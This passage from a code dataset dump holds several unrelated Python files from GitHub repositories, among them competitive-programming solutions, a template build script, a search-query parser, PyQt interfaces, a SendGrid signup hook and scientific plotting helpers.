1)\nsim.make_movie()","repo_name":"Johanstab/BioSim_G13_Johan_Sabina","sub_path":"examples/video_demo.py","file_name":"video_demo.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"13941336927","text":"def uniquePaths(m, n):\n    ans = 1\n    if m > n:\n        # 一共要向右走m-1步,向下走n-1步,共m+n-2步\n        # 共有多少走的方法,看作是在m+n-2步中选择n-1步\n        for i in range(n-1):\n            ans *= m+i\n            ans /= n-1-i\n        return round(ans, 0)\n    else:\n        for i in range(m-1):\n            ans *= n+i\n            ans /= m-1-i\n        return round(ans)\n\n\nprint(uniquePaths(10, 10))","repo_name":"pda37/HelloPython","sub_path":"basic_python/practice/uniquePaths.py","file_name":"uniquePaths.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37954057709","text":"#!/usr/bin/python3\n\nfrom enum import Enum\nimport os\nimport re\nimport xml\n\n\nSRC_DIR = \"./src\"\nDIST_DIR = \"./dist\"\n\nTEMPLATE_DIR = os.path.join(SRC_DIR, \"templates\")\n\n\nclass TemplateType:\n    PLAINTEXT = 0\n    HTML = 1\n\n\ndef main():\n    if not os.path.exists(DIST_DIR):\n        os.mkdir(DIST_DIR)\n    if not os.path.exists(f\"{DIST_DIR}/templates\"):\n        os.mkdir(f\"{DIST_DIR}/templates\")\n    menus, scripts = collect_templates()\n    with open(os.path.join(DIST_DIR, \"Template.js\"), \"w\") as file:\n        file.write(compile_template_scripts(scripts))\n    with open(os.path.join(DIST_DIR, \"scripts.xml\"), \"w\") as file:\n        document = render_scripts(scripts)\n        file.write(document)\n    for menu in menus:\n        with open(os.path.join(DIST_DIR, \"templates\", menu[\"title\"] + \".xml\"), \"w\") as file:\n            document = render_templates(menu)\n            file.write(document)\n\n\ndef collect_common_scripts():\n    scripts = []\n    return \"\\n\\n\".join(scripts)\n\n\ndef compile_template_scripts(template_scripts):\n    script = \"\"\n    with open(os.path.join(SRC_DIR, \"template.js\"), \"r\") as file:\n        script += file.read()\n    script += 
\"const templates = {}\\n\\n\"\n for template_script in template_scripts:\n script += \"templates.\" + \\\n template_script[\"name\"] + \\\n \" = () => {\\n\" + template_script[\"body\"] + \"\\n};\\n\\n\"\n script += \"return renderTemplate();\"\n return script\n\n\ndef collect_templates():\n menus = []\n scripts = []\n for menu_title in os.listdir(TEMPLATE_DIR):\n texts = []\n dirpath = os.path.join(TEMPLATE_DIR, menu_title)\n for filename in os.listdir(dirpath):\n filepath = os.path.join(dirpath, filename)\n script_name = snakecase(menu_title) + \"__\" + filename.split(\".\")[0]\n text_name, script_body = parse_template(filepath)\n texts.append({\n \"name\": text_name,\n \"body\": \"[[SCRIPT=Template|{}]]\".format(script_name),\n })\n scripts.append({\n \"name\": script_name,\n \"body\": script_body,\n })\n menus.append({\n \"title\": menu_title,\n \"texts\": texts,\n })\n return menus, scripts\n\n\ndef render_scripts(scripts):\n document = '\\n'\n document += '\\n'\n document += 'scripts\\n'\n template_script = compile_template_scripts(scripts)\n document += '\\n'\n document += '\\n'\n return document\n\n\ndef render_templates(menu):\n document = '\\n'\n document += '\\n'\n document += 'templates\\n'\n document += '\\n'\n document += '<![CDATA[{title}]]>\\n'.format(\n title=menu[\"title\"])\n document += '\\n'\n for text in menu[\"texts\"]:\n document += '\\n'.format(\n template_type=TemplateType.HTML)\n document += '\\n'.format(\n name=text[\"name\"])\n document += '\\n'.format(\n body=text[\"body\"])\n document += '\\n'\n document += '\\n'\n document += '\\n'\n document += '\\n'\n return document\n\n\ndef parse_template(filepath):\n frontmatter = {}\n with open(filepath, \"r\") as file:\n lines = file.readlines()\n for line in lines:\n matches = re.match(\"^[ ]*\\*{1}[ ]*([a-z]*):[ ]*(.*)\", line)\n if matches:\n key = matches[1]\n value = matches[2].strip()\n frontmatter[key] = value\n elif re.match(\"^[ ]*\\*/[ ]*$\", line) is not None:\n break\n text_name = frontmatter[\"name\"]\n with open(filepath, \"r\") as file:\n script_body = file.read()\n return text_name, script_body\n\n\ndef remove_whitespace(script):\n \"\"\"Rmeove all whitespace and newlines.\"\"\"\n for i in range(10):\n script = script.replace(\" \", \" \")\n script = re.sub(\"\\n\", \"\", script)\n script = re.sub(\"\\r\", \"\", script)\n return script\n\n\ndef snakecase(value):\n return value.lower().replace(\" \", \"_\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"allbizsupplies/thunderbird-quicktext-templates","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30778907651","text":"a = int(input())\ns = list(input())\nlist1 = [0,0]\n\n#for i in s :\n#\tif i == 'a': \n#\t\tlist1[0] += 1\n#\telif i == 'b':\n#\t\tlist1[1] += 1 \n#n1 = list1[0]\n#n2 = list1[1]\n#count = 0 \n#print(n1,n2)\n#while(n1 != n2):\n#\tcount = count + 1\n#\tif(n1 > n2 ):\n#\t\tn1 -= 1 \n#\t\tn2 += 1\n#\telse:\n#\t\tn1 += 1\n#\t\tn2 -= 1\n#print(count)\ncount = 0 \nfor i in range(1,len(s), 2):\n if(s[i-1] == 'a' and s[i] == 'a'):\n count = count + 1 \n s[i-1] = 'b' \n elif(s[i-1] == 'b' and s[i] == 'b') : \n count = count + 1\n s[i-1] = 'a' \n else :\n continue\np = \"\"\nprint(count)\nfor i in s :\n p = p + i 
\nprint(p)","repo_name":"sankalp1999/Competitive-Programming","sub_path":"CP/Codeforces/Main_Before_July_2020/1216A.py","file_name":"1216A.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"19"} +{"seq_id":"71373840362","text":"import re\nimport time\nfrom logging import getLogger\n\n# pylint: disable=invalid-name\nlogger = getLogger(__name__)\n\n\nclass Helper(object): # pylint: disable=useless-object-inheritance\n # pylint: disable=too-few-public-methods\n \"\"\"Helper functions\"\"\"\n\n @staticmethod\n def decode_search(query):\n # Not possible to do it clearly with simplification...\n # pylint: disable=too-many-nested-blocks, too-many-locals\n \"\"\"Decode a search string:\n\n Convert string from:\n isnot:0 isnot:ack isnot:\"downtime fred\" name:\"vm fred\"\n to a backend search query expression.\n\n Search string is documented in the `modal_search_help.tpl` file\n\n :param query: search string\n :param data_model: table data model as built by the DataTable class\n\n :return: query to be provided to the data manager search objects function\n \"\"\"\n logger.debug(\"decode_search, search string: %s\", query)\n\n # Search patterns like: isnot:0 isnot:ack isnot:\"downtime test\" name \"vm test\"\n regex = re.compile(\n r\"\"\"\n # 1/ Search a key:value pattern.\n (?P\\w+): # Key consists of only a word followed by a colon\n (?P[\"']?) # Optional quote character.\n (?P.*?) # Value is a non greedy match\n (?P=quote2) # Closing quote equals the first.\n ($|\\s) # Entry ends with whitespace or end of string\n | # OR\n # 2/ Search a single string quoted or not\n (?P[\"']?) # Optional quote character.\n (?P.*?) # Name is a non greedy match\n (?P=quote) # Closing quote equals the opening one.\n ($|\\s) # Entry ends with whitespace or end of string\n \"\"\",\n re.VERBOSE\n )\n\n qualifiers = {}\n for match in regex.finditer(query):\n if match.group('name'):\n if 'host_name' not in qualifiers:\n qualifiers['host_name'] = []\n qualifiers['host_name'].append(match.group('name'))\n elif match.group('key'):\n field = match.group('key')\n if field not in qualifiers:\n qualifiers[field] = []\n qualifiers[field].append(match.group('value'))\n logger.debug(\"decode_search, search patterns: %s\", qualifiers)\n\n data_model = {\n 'host_name': {\n 'title': 'Host name'\n },\n 'service_name': {\n 'title': 'Service name'\n },\n 'user_name': {\n 'title': 'User name'\n },\n 'type': {\n 'title': 'Event type',\n 'allowed': 'webui.comment,check.result,check.request,check.requested,'\n 'ack.add,ack.processed,ack.delete,'\n 'downtime.add,downtime.processed,downtime.delete,'\n 'monitoring.timeperiod_transition,'\n 'monitoring.alert,monitoring.event_handler,'\n 'monitoring.flapping_start,monitoring.flapping_stop,'\n 'monitoring.downtime_start,monitoring.downtime_cancelled,'\n 'monitoring.downtime_end,'\n 'monitoring.acknowledge,'\n 'monitoring.notification'\n },\n 'message': {\n 'title': 'Event message'\n }\n }\n\n parameters = {}\n try:\n for field in qualifiers:\n field = field.lower()\n patterns = qualifiers[field]\n logger.info(\"decode_search, searching for '%s' '%s'\", field, patterns)\n\n # Get the column definition for the searched field\n if field not in data_model:\n logger.warning(\"decode_search, unknown column '%s' in table fields\", field)\n continue\n\n c_def = data_model[field]\n logger.debug(\"decode_search, found column: %s\", c_def)\n\n regex = c_def.get('regex', True)\n\n for pattern in patterns:\n 
logger.info(\"decode_search, pattern: %s\", pattern)\n not_value = pattern.startswith('!')\n if not_value:\n pattern = pattern[1:]\n\n if field in parameters:\n # We already have a field search pattern, let's build a list...\n if not isinstance(parameters[field]['pattern'], list):\n if regex:\n parameters[field]['type'] = \"$or\"\n else:\n parameters[field]['type'] = \"$in\"\n parameters[field]['pattern'] = [parameters[field]['pattern']]\n\n if not_value:\n parameters[field]['pattern'].append(\n {\"$regex\": \"/^((?!%s).)*$/\" % pattern})\n else:\n parameters[field]['pattern'].append(\n {\"$regex\": \".*%s.*\" % pattern})\n continue\n\n if not_value:\n parameters.update(\n {field: {'type': 'simple',\n 'pattern': {\"$regex\": \"/^((?!%s).)*$/\" % pattern}}})\n else:\n parameters.update(\n {field: {'type': 'simple',\n 'pattern': {\"$regex\": \".*%s.*\" % pattern}}})\n\n logger.info(\"decode_search, - parameters: %s\", parameters)\n except Exception as exp:\n logger.exception(\"Exception: %s\", exp)\n\n query = {}\n for field, search_type in parameters.items():\n logger.debug(\"decode_search, build query: %s - %s\", field, search_type)\n if search_type['type'] == 'simple':\n query.update({field: search_type['pattern']})\n elif search_type['type'] == '$or':\n logger.debug(\"decode_search, - $or query: %s\", search_type['pattern'])\n patterns = []\n for pattern in search_type['pattern']:\n patterns.append({field: pattern})\n query.update({'$or': patterns})\n elif search_type['type'] == '$in':\n logger.debug(\"decode_search, - $in query: %s\", search_type['pattern'])\n included = []\n excluded = []\n for pattern in search_type['pattern']:\n if isinstance(pattern, dict):\n if '$ne' in pattern:\n excluded.append(pattern['$ne'])\n else:\n included.append(pattern)\n if included and excluded:\n query.update({field: {'$in': included, '$nin': excluded}})\n else:\n if included:\n query.update({field: {'$in': included}})\n if excluded:\n query.update({field: {'$nin': excluded}})\n elif search_type['type'] == '$ne':\n logger.debug(\"decode_search, - $ne query: %s\", search_type['pattern'])\n query.update({field: {'$ne': search_type['pattern']}})\n\n logger.debug(\"decode_search, result query: %s\", query)\n return query\n","repo_name":"Alignak-monitoring-contrib/alignak-module-ws","sub_path":"alignak_module_ws/utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":7738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70600716524","text":"import sys\n\nfrom PyQt5.QtWidgets import (\n QApplication, QDialog, QMainWindow, QMessageBox\n)\nfrom PyQt5.uic import loadUi\n\nfrom ui.main_interface import Ui_MainWindow\n\nfrom src.pkl import load_results\nfrom src.read_file import read_requests\nfrom src.requests import Request\nfrom src.evaluations import evaluate_vectorial_function\n\nfrom src.tfidf import execute_tfidf\nfrom src.boolean_model import boolean_model\nfrom src.vectorial_model import vectorial_model, LIST_MEASURES_FUNCTIONS\n\n\nTRANSLATION_MEASURES_FUNCTIONS = {\n\t'Produit Interne' : 'internal product',\n\t'Coeficient de Dice' : 'dice coeficient',\n\t'Mesure de Cosinus' : 'cosinus measure',\n\t'Mesure de Jaccard' : 'jaccard measure',\n}\n\nclass Window(QMainWindow, Ui_MainWindow):\n\tdef __init__(self, parent=None):\n\t\tsuper().__init__(parent)\n\t\tself.setupUi(self)\n\n\t\tself.setWindowTitle('Projet RI')\n\n\t\tself.setup_values()\n\t\tself.setup_conections()\n\n\tdef 
setup_values(self):\n\t\tread_requests()\n\t\ttry:\n\t\t\tself.inverse_weight_matrix, self.inverse_structure = load_results()\n\t\texcept FileNotFoundError as e:\n\t\t\tself.inverse_weight_matrix, self.inverse_structure = execute_tfidf()\n\n\t\tself.QueryText.setPlainText(Request.REQUESTS[0].content)\n\n\tdef setup_conections(self):\n\t\tself.SearchInput.clicked.connect(self.search_by_input)\n\t\tself.SearchQueryText.clicked.connect(self.search_by_query)\n\t\tself.QueryNumber.valueChanged.connect(self.update_predifined_query)\n\n\tdef search_by_query(self):\n\t\tif self.ModelChoice.currentText() == 'Le Model Boolean':\n\t\t\tQMessageBox.about(self, \"Model Error\",\n\t\t\t\"This function isn't available for this model, please select the vectorial model in order to continue\")\n\t\telse:\n\t\t\t# call the vectoriel model\n\t\t\tquery_number = self.QueryNumber.value()\n\t\t\tthreshold = self.Threshold.value()\n\t\t\tchoice = self.MeasureChoice.currentText()\n\t\t\tprecision, recall, fmeasure, selected_documents = evaluate_vectorial_function(\n\t\t\t\tself.inverse_weight_matrix, TRANSLATION_MEASURES_FUNCTIONS[choice],\n\t\t\t\t\t\t\tRequest.REQUESTS[query_number-1], threshold)\n\n\t\t\tif not self.is_selection_empty(selected_documents):\n\t\t\t\t# show the content inside the list\n\t\t\t\tself.update_list(selected_documents)\n\n\t\t\tself.Precision.setText(str(\"%.5f\" % precision))\n\t\t\tself.Recall.setText(str(\"%.5f\" % recall))\n\t\t\tself.FMeasure.setText(str(\"%.5f\" % fmeasure))\n\n\tdef search_by_input(self):\n\t\tquery = self.QueryInput.toPlainText()\n\t\tif query == \"\":\n\t\t\tQMessageBox.about(self, \"the query must not be empty\",\n\t\t\t\"please write your query before clicking the search button\")\n\t\t\treturn\n\n\t\tif self.ModelChoice.currentText() == 'Le Model Boolean':\n\t\t\t# call the boolean model\n\t\t\tselected_documents = boolean_model(query)\n\t\telse:\n\t\t\t# call the vectoriel model\n\t\t\tthreshold = self.Threshold.value()\n\t\t\tchoice = self.MeasureChoice.currentText()\n\t\t\tselected_documents = vectorial_model(query, self.inverse_weight_matrix,\n\t\t\t\tmeasure_function=LIST_MEASURES_FUNCTIONS[TRANSLATION_MEASURES_FUNCTIONS[choice]],\n\t\t\t\t\t\t\t\t\t\tthreshold=threshold)\n\n\n\t\tif not self.is_selection_empty(selected_documents):\n\t\t\t# show the content inside the list\n\t\t\tself.update_list(selected_documents)\n\n\tdef is_selection_empty(self, selected_documents):\n\t\tif len(selected_documents) == 0:\n\t\t\tQMessageBox.about(self, \"no document found\",\n\t\t\t\"No document has been found with this query and parameters\")\n\t\t\tself.Result.clear()\n\t\t\treturn True\n\t\treturn False\n\n\tdef update_list(self, selected_documents):\n\t\t# clear the list\n\t\tself.Result.clear()\n\t\t# add items\n\t\tfor document in selected_documents:\n\t\t\tself.Result.addItem(document.id)\n\n\tdef update_predifined_query(self, value):\n\t\tself.QueryText.setPlainText(Request.REQUESTS[value-1].content)\n\ndef launch_ui():\n\tapp = QApplication(sys.argv)\n\twindow = Window()\n\twindow.show()\n\tsys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n\tlaunch_ui()\n","repo_name":"aymenkhs/information-retrieval-on-cacm-collection","sub_path":"ui/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"12032539825","text":"import pandas as pd\nimport numpy as np\nimport xlwt\n\ndef coding(patientId, visitId):\n theId = patientId.__str__() + \"&\" 
+ visitId.__str__()\n return theId\n\ndef decoding(theId):\n patientId =''\n visitId =''\n flag = 0\n for i in theId:\n if i=='&':\n flag=1\n continue\n if flag == 0:\n patientId = patientId+i\n else:\n visitId = visitId + i\n return patientId,visitId\n\ndef main():\n data = pd.read_csv('f:/r7.csv')\n print(len(data))\n c = len(data)\n\n for i in data.columns:\n num = 0\n for j in range(len(data)):\n if data[i][j] == 'None':\n num = num + 1\n\n if num > c *0.3:\n data = data.drop(i,axis=1)\n\n print(data)\n data = data.set_index(['patient_id', 'visit_id'])\n r = len(data.values[0])\n for i in data.index:\n num = 0\n\n for j in range(r):\n if data.loc[i][j] == 'None':\n num = num + 1\n\n if num > r *0.3:\n data = data.drop(i)\n print(data)\n data.to_csv('f:/selected.csv')\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"chenjinbiao/AcsPatientDatasetConstruction","sub_path":"select1.py","file_name":"select1.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31528785580","text":"from battleships.objects.Board import Board\n\n# Import the engine.\nimport engine\n\n\nclass ShipBoard(Board):\n \"\"\"\n Board object that renders all the ships from the player.\n \"\"\"\n\n def __init__(self, parent):\n \"\"\"\n Class constructor.\n Creates a new board on the screen.\n :param parent: The parent of the board.\n \"\"\"\n # Call the parent constructor.\n super().__init__(parent)\n\n # Create the board background.\n ShipBoard.create_background(self, (0, 64, 128), (255, 255, 255))\n\n # List of all the placed ships.\n self.placed_ships = []\n\n def remove_boat(self, boat):\n if boat in self.placed_ships:\n self.placed_ships.remove(boat)\n\n def place_boat(self, boat):\n self.placed_ships.append(boat)\n\n def all_boats_placed(self):\n return len(self.placed_ships) == 5\n\n def position_is_valid(self, cell, length, direction):\n \"\"\"\n Checks if the position is valid for the specified ship.\n :param cell: The cell that is requested.\n :param length: The length of the ship to place.\n :param direction: The direction of the ship.\n :return: True if the position is valid.\n \"\"\"\n # Check if the position is within the bounds.\n if cell.x >= 0 and cell.y >= 0:\n if cell.x <= 10 and cell.y <= 10:\n # If the ship is in the bounds.\n if direction % 2 == 0:\n if cell.x <= 10 - length:\n # Check for collisions\n return self.collision_check(cell, length, direction) is None\n else:\n if cell.y <= 10 - length:\n # Check for collisions\n return self.collision_check(cell, length, direction) is None\n\n @staticmethod\n def __get_covered_cells(cell, length, direction):\n covered_cells = []\n for i in range(length):\n if direction % 2 == 0:\n covered_cells.append(i + (cell.x + cell.y * 10))\n else:\n covered_cells.append((i * 10) + (cell.x + cell.y * 10))\n\n return covered_cells\n\n def collision_check(self, cell, length, direction):\n # Compute all the cells covered by the ship/shot.\n covered_cells = ShipBoard.__get_covered_cells(cell, length, direction)\n\n # Loop through all the ships.\n for ship in self.placed_ships:\n ship_cells = ShipBoard.__get_covered_cells(ship.get_cell(), ship.length, ship.rotation)\n intersect = list(set(covered_cells) & set(ship_cells))\n if len(intersect) > 0:\n return ship\n\n return 
None\n\n","repo_name":"yShimoka/Python-Bataille-Navale","sub_path":"battleships/objects/ShipBoard.py","file_name":"ShipBoard.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"28237323190","text":"# -*- coding: utf-8 -*-\n# Third-party app imports\nimport sendgrid\n\n# Imports from app\nfrom .models import Company, UserProfile\nfrom context.settings.secrets import SENDGRID_API_KEY\n\n# Initializing SendGrid: created in order to send emails with SendGrid\n# templates\nsg = sendgrid.SendGridClient(SENDGRID_API_KEY)\n\n\ndef check_company_auth(strategy, details, user=None, *args, **kwargs):\n try:\n user_profile = UserProfile.objects.get(user=user)\n except UserProfile.DoesNotExist:\n user_profile = None\n\n # Find or create company domain\n split_email = details['email'].split('@')\n company_name = split_email[1].split('.')[0]\n company_profile, created = Company.objects.get_or_create(\n name=company_name,\n email_extension=split_email[1],\n )\n\n if not user_profile and details['email']:\n user_profile, created = UserProfile.objects.get_or_create(\n user=user,\n company=company_profile,\n )\n else:\n user_profile.company = company_profile\n user_profile.save()\n\n\ndef send_welcome_email(strategy, details, user=None, is_new=False, *args, **kwargs):\n if is_new:\n full_name = ' '.join((details['first_name'], details['last_name']))\n email = details['email']\n\n message = sendgrid.Mail()\n message.set_from('NewsAI ')\n message.set_subject('Welcome to NewsAI!')\n message.set_text('Welcome to NewsAI!')\n\n if full_name and email:\n message.add_to(full_name + ' <' + email + '>')\n message.add_substitution('-fullname-', full_name)\n message.add_filter('templates', 'template_id',\n '39e92d35-09a0-43a5-9629-03fcefecdc2b')\n status, msg = sg.send(message)\n","repo_name":"news-ai/context","sub_path":"app/context/apps/users/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43144853865","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 9 15:20:11 2018\n\n@author: shahrear\nstudent.eco86@gmail.com\n©Md. 
Shahrear Zaman\nreference books:\n1.Economic Dynamics\n4th Edition\n2010\nby \nGiancarlo Gandolfo\npage-379\n\n2.User's Guide\nNumPy User Guide\nRelease 1.11.0\nWritten by the NumPy community\nMay 29, 2016\n\n3.User's Guide\nMatplotlib\nRelease 2.1.0\nby John Hunter, Darren Dale, Eric Firing, Michael Droettboom and the m\nOctober 07, 2017\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nX, Y = np.meshgrid(np.arange(-20, 20, 1), np.arange(-10, 10, 1))\n#X, Y = np.meshgrid(np.arange(-10, 10, 1), np.arange(-5, 5, 1))\nomega=0.8\nbeta=1\nXdot=Y\nYdot=-(omega**2)*X-2*beta*Y\nplt.figure()\nplt.title('Phase & Directional Diagram: Linear System')\nQ=plt.quiver(X,Y,Xdot,Ydot,units='width')\nplt.show()\n","repo_name":"shahrear86/Dynamics","sub_path":"diaglinsys.py","file_name":"diaglinsys.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"19266522795","text":"import clipboard\r\nfrom PIL import Image, ImageGrab\r\nimport pyautogui\r\nimport time\r\nimport pygame\r\nimport pytesseract\r\nimport csv\r\n\r\npygame.init() # pygame must be initialised before using its event queue below\r\nnumColumns = 3 # number of iterations it will run, and cells it will create\r\npyautogui.hotkey('alt', 'tab')\r\ndata = []\r\nfor x in range(numColumns): # range() so we iterate numColumns times, not over an int\r\n    pyautogui.hotkey('win', 'shift', 's') # hotkey() takes the keys as separate arguments\r\n    # -----this code has us wait for a mouse click\r\n    copied = False\r\n    while not copied:\r\n        event = pygame.event.wait()\r\n        if event.type == pygame.MOUSEBUTTONUP:\r\n            im = ImageGrab.grabclipboard() # grab the fresh snip from the clipboard\r\n            im.save('tempPic.png', 'PNG')\r\n            datum = (pytesseract.image_to_string(Image.open('tempPic.png')))\r\n            data.append(datum)\r\n            time.sleep(.1)\r\n            copied = True\r\nprint(data)\r\nclipboard.copy(str(data)) # clipboard.copy() needs the text to place on the clipboard\r\n","repo_name":"elijahnicpon/NF-Internship-Work","sub_path":"Random Python Projects/ULSucksAtScanning.py","file_name":"ULSucksAtScanning.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"41974413269","text":"# auxiliary functions for the FGL-ML project\n\nimport numpy as np\nimport pandas as pd\n\ndef tform2dtype(tform):\n    if tform.find('A') > -1:\n        return str\n    elif tform.find('E') > -1 or tform.find('D') > -1:\n        if len(tform) == 1:\n            return float\n        else:\n            return 'array'\n    elif tform.find('I') > -1:\n        if len(tform) == 1:\n            return int\n        else:\n            return 'array'\n\ndef hdu2df(table, index_name=None):\n    if index_name is not None:\n        index = np.array(table.data.field(index_name), dtype=str)\n        index = [st.strip() for st in index]\n    all_keys = list(table.header.keys())\n    data = {}\n    for key in all_keys:\n        if key.startswith('TFORM'):\n            form = table.header[key]\n            dtype = tform2dtype(form)\n            if dtype != 'array':\n                type_key = key.replace('TFORM', 'TTYPE')\n                data_key = table.header[type_key]\n                if data_key != index_name:\n                    data[data_key] = np.array(table.data.field(data_key), dtype=dtype)\n    return pd.DataFrame(data=data, index=index)\n    #df_fgl.index = [st.strip() for st in df_fgl.index]\n\n    \ndef get_prob_class(df, algs, classes):\n    res = pd.DataFrame(index=df.index)\n    res['Category_Prob'] = 'MIXED'\n    masks = {}\n    classes_loc = [cls for cls in classes if ('%s_%s' % (cls, algs[0])) in df.columns]\n    for cls in classes_loc:\n        masks[cls] = 1.\n    for alg in algs:\n        #print(alg)\n        columns = ['%s_%s' % (cls, alg) for cls in classes_loc]\n        thres = np.max(df[columns], axis=1) - 1.e-5\n        #print(thres)\n        for cls in classes_loc:\n            clm = '%s_%s' % (cls, alg)\n            masks[cls] *= np.heaviside(df[clm] - thres, 0.)\n            #print(cls, masks[cls])\n 
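# Editor's note: at this point masks[cls] equals 1. only on rows where cls\n # scores within 1e-5 of the maximum for every algorithm in algs; all other\n # rows keep the 'MIXED' label assigned above.\n 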
for cls in classes_loc:\n        msk = np.array(masks[cls], dtype=bool)\n        res['Category_Prob'][msk] = cls\n    return res\n\ndef accuracy(true_labels, pred_labels):\n    return np.sum(true_labels == pred_labels) / len(true_labels)\n\n\ndef h2cum(arr):\n    res = 1. * arr[::-1]\n    for i in range(1, len(arr)):\n        res[i] += res[i - 1]\n    return res[::-1]\n\ndef min_max_vs(dct, corr={}, keys=None):\n    if keys is None:\n        keys = dct.keys()\n    vals = np.array([dct[key] - corr.get(key, 0.) for key in keys])\n    return np.min(vals, axis=0), np.max(vals, axis=0)\n\ndef get_mean_dp_dm(pred):\n    mean = np.mean(pred)\n    delta_plus = np.max(pred) - mean\n    delta_minus = mean - np.min(pred)\n    return mean, delta_plus, delta_minus\n","repo_name":"aakashbhat/Fermi-LAT","sub_path":"py_dima/auxil_ML.py","file_name":"auxil_ML.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"37566904927","text":"import collections\nimport sys\nimport heapq\n\ninput = sys.stdin.readline\n\n\ndef inp():\n    return (int(input()))\ndef inlt():\n    return (list(map(int, input().split())))\ndef insr():\n    s = input()\n    return (list(s[:len(s) - 1]))\ndef invr():\n    return (map(int, input().split()))\n\n\ndef solution():\n    n, k = inlt()\n    a = inlt()\n    res = 0\n    intervals = []\n    for i in range(1, n):\n        interval = abs(a[i] - a[i-1])\n        intervals.append(interval)\n        res += interval\n    intervals.sort(reverse=True)\n    for i in range(k-1):\n        res -= intervals[i]\n    print(res)\n    return 0\n\n\nif __name__ == '__main__':\n    t = inp()\n    for i in range(t):\n        solution()\n","repo_name":"cybsbbb/codeforces_practice","sub_path":"contests/Round882/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"19337339833","text":"#The Fibonacci series is formed by the sequence 0,1,1,2,3,5,8,13,21,34,55,...\n#Write a program able to generate the series up to the n-th term.\n\ntermos = int(input('How many terms of the Fibonacci sequence do you want to generate? 
'))\nfibonacci = 0\na = 1\nb = 1\nfibonacci = 0\nfor n in range(0, termos):\n if n == 0:\n print(a, b, end=' ')\n else:\n fibonacci = b + a\n a = b\n b = fibonacci\n print(fibonacci, end=' ')\n\n","repo_name":"prmmendes/Python-Exercicios","sub_path":"3.15_estrutura_de_repeticao.py","file_name":"3.15_estrutura_de_repeticao.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14025208529","text":"from flask_app import app\nfrom flask import render_template,redirect,request,session,flash\nfrom flask_app.models.ninja import Ninja\nfrom flask_app.models.dojo import Dojo\n\n@app.route('/new_ninja')\ndef new_ninja():\n dojos = Dojo.get_all_dojos()\n return render_template(\"new_ninja.html\", all_dojos=dojos)\n\n@app.route('/create_ninja', methods=[\"POST\"])\ndef create_ninja():\n # First we make a data dictionary from our request.form coming from our template.\n # The keys in data need to line up exactly with the variables in our query string.\n data = {\n \"fname\": request.form[\"fname\"],\n \"lname\" : request.form[\"lname\"],\n \"age\" : request.form[\"age\"],\n \"dojo_id\" : request.form[\"dojo_id\"]\n }\n # We pass the data dictionary into the save method from the Ninja class.\n id = Ninja.insert_new_ninja(data)\n # Don't forget to redirect after saving to the database.\n return redirect('/dojos/' + data['dojo_id'])\n","repo_name":"dfried514/python2022","sub_path":"flask_mysql/crud/dojos_and_ninjas/flask_app/controllers/ninjas.py","file_name":"ninjas.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43102828000","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QSizePolicy\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtGui import QCursor\r\n\r\ndef find_all_possibilities(lst,i):\r\n if (i>u) or (len(lst) == o) :\r\n possibilities.append(lst)\r\n return\r\n if (i not in [_[0] for _ in lst]):\r\n for myitem in range(1,u+1):\r\n if (myitem not in [_[1] for _ in lst]):\r\n if len([0 for p in lst if abs(p[0]-i) == abs(p[1]-myitem)])==0:\r\n find_all_possibilities(lst+[[i,myitem]],i+1)\r\n\r\ndef start(n,k):\r\n global possibilities , u,o\r\n u = n\r\n o = k\r\n possibilities = []\r\n find_all_possibilities([],1)\r\n return possibilities\r\n\r\nclass Pawn(QtWidgets.QWidget):\r\n def __init__(self,color):\r\n super().__init__()\r\n if color == 1:\r\n self.image = QtGui.QPixmap('bq.png')\r\n else:\r\n self.image = QtGui.QPixmap('wq.png')\r\n self.setMinimumSize(30, 30)\r\n def paintEvent(self, event):\r\n qp = QtGui.QPainter(self)\r\n size = min(self.width(), self.height())\r\n qp.drawPixmap(0, 0, self.image.scaled(\r\n size, size, QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation))\r\n\r\nclass process(QtWidgets.QWidget):\r\n def __init__(self , brd):\r\n 